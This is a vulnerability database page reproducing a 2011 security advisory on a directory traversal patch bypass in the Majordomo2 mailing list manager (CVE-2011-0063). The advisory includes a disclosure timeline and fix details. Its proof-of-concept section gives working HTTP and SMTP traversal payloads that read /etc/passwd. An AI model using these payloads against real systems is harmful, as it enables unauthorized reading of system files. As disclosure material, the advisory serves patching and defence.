Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNikolas SotiriuPACKETSTORM:99093
HistoryMar 08, 2011 - 12:00 a.m.

Majordomo2 Directory Traversal

2011-03-0800:00:00
Nikolas Sotiriu
packetstormsecurity.com
30

0.04 Low

EPSS

Percentile

91.0%

JSON
`______________________________________________________________________  
-------------------------- NSOADV-2011-003 ---------------------------  
  
Majordomo2 'help' Command Directory Traversal (Patch Bypass)  
______________________________________________________________________  
______________________________________________________________________  
  
111101111  
11111 00110 00110001111  
111111 01 01 1 11111011111111  
11111 0 11 01 0 11 1 1 111011001  
11111111101 1 11 0110111 1 1111101111  
1001 0 1 10 11 0 10 11 1111111 1 111 111001  
111111111 0 10 1111 0 11 11 111111111 1 1101 10  
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100  
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011  
0111111110 0110 1110 1 0 11101111111111111011 11100 00  
01111 0 10 1110 1 011111 1 111111111111111111111101 01  
01110 0 10 111110 110 0 11101111111111111111101111101  
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111  
111110110 10 0111110 1 0 0 1111111111111111111111111 110  
111 11111 1 1 111 1 10011 101111111111011111111 0 1100  
111 10 110 101011110010 11111111111111111111111 11 0011100  
11 10 001100 0001 111111111111111111 10 11 11110  
11110 00100 00001 10 1 1111 101010001 11111111  
11101 0 1011 10000 00100 11100 00001101 0  
0110 111011011 0110 10001 101 11110  
1011 1 10 101 000001 01 00  
1010 1 11001 1 1 101 10  
110101011 0 101 11110  
110000011  
111  
______________________________________________________________________  
______________________________________________________________________  
  
Title: Majordomo2 'help' Command Directory Traversal  
Severity: Medium  
Advisory ID: NSOADV-2011-003  
CVE: CVE-2011-0063  
Found Date: 03.02.2011  
Date Reported: 03.02.2011  
Release Date: 19.02.2011  
Author: Nikolas Sotiriu  
Mail: nso-research at sotiriu.de  
Website: http://sotiriu.de/  
Twitter: http://twitter.com/nsoresearch  
Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt  
Vendor/Project: http://www.mj2.org/  
Affected Products: majordomo2 <= 20110203  
Remote Exploitable: Yes  
Local Exploitable: No  
Patch Status: Vendor released a patch (See Solution)  
Discovered by: Nikolas Sotiriu  
Disclosure Policy: http://sotiriu.de/policy.html  
Thanks to: Thierry Zoller: For the permission to use his  
Policy  
  
  
  
Background:  
===========  
  
Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo  
mailing list manager software by Jason Tibbitts and Michael Yount.  
  
  
  
Description:  
============  
  
Majordomo2 <= 20110203 is affected by a Directory Traversal  
vulnerability due to parameter 'extra' of the 'help' command in the  
function '_list_file_get()' is not properly sanitized.  
  
The original bug was made public on 03.02.2011 by Michael Brooks  
of sitewat.ch:  
  
https://sitewat.ch/en/Advisory/View/1  
https://bugzilla.mozilla.org/show_bug.cgi?id=628064  
  
I discovered, that the patch, which is in the CVS since version 20110125  
don't protect against the Directory Traversal bug.  
  
https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481  
  
The diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes  
'../' from $file. Bypassing this regex is quiet simple by using './.../'  
insted '../'.  
  
  
  
Proof of Concept :  
==================  
  
HTTP:  
http://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&  
extra=./..././..././..././..././..././..././..././.../etc/passwd  
  
SMTP:  
help ./..././..././..././..././..././..././..././.../etc/passwd  
  
  
  
Solution:  
=========  
  
Update to Majordomo2 >= 20110204  
  
http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz  
  
  
  
References:  
===========  
  
Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1  
Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064  
Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307  
  
  
  
Disclosure Timeline (YYYY/MM/DD):  
=================================  
  
2011.02.03: Patch bypass vulnerability found  
2011.02.03: Informed security [at] mozilla.org  
2011.02.03: Mozilla opend Bug 631307 in bugzilla  
2011.02.03: Jason Tibbitts comitted a fix (Sorry again)  
2011.02.04: Snapshot available for download  
2011.02.04: Discuss the public disclosure  
2011.03.04: Got the Bug Bounty Money  
2011.03.08: Release of Advisory  
  
  
  
  
  
  
`

Related

securityvulns 1
d2 1
prion 1
cve 1
openvas 1
dsquare 1
nessus 1
nuclei 1
securityvulns
securityvulns
NSOADV-2011-003: Majordomo2 &#39;help&#39; Command Directory Traversal &#40;Patch Bypass&#41;
2011-03-10 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_MAJORDOMO2
2011-03-15 17:55:00
prion
prion
Directory traversal
2011-03-15 17:55:00
cve
cve
CVE-2011-0063
2011-03-15 17:55:00
openvas
openvas
Majordomo2 Directory Traversal Vulnerability
2011-02-07 00:00:00
dsquare
dsquare
Majordomo 2 File Disclosure
2012-04-27 00:00:00
nessus
nessus
Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
2011-02-16 00:00:00
nuclei
nuclei
Majordomo2 - SMTP/HTTP Directory Traversal
2021-04-18 10:16:06

0.04 Low

EPSS

Percentile

91.0%

JSON
Related for PACKETSTORM:99093
securityvulns1d21prion1cve1openvas1dsquare1nessus1nuclei1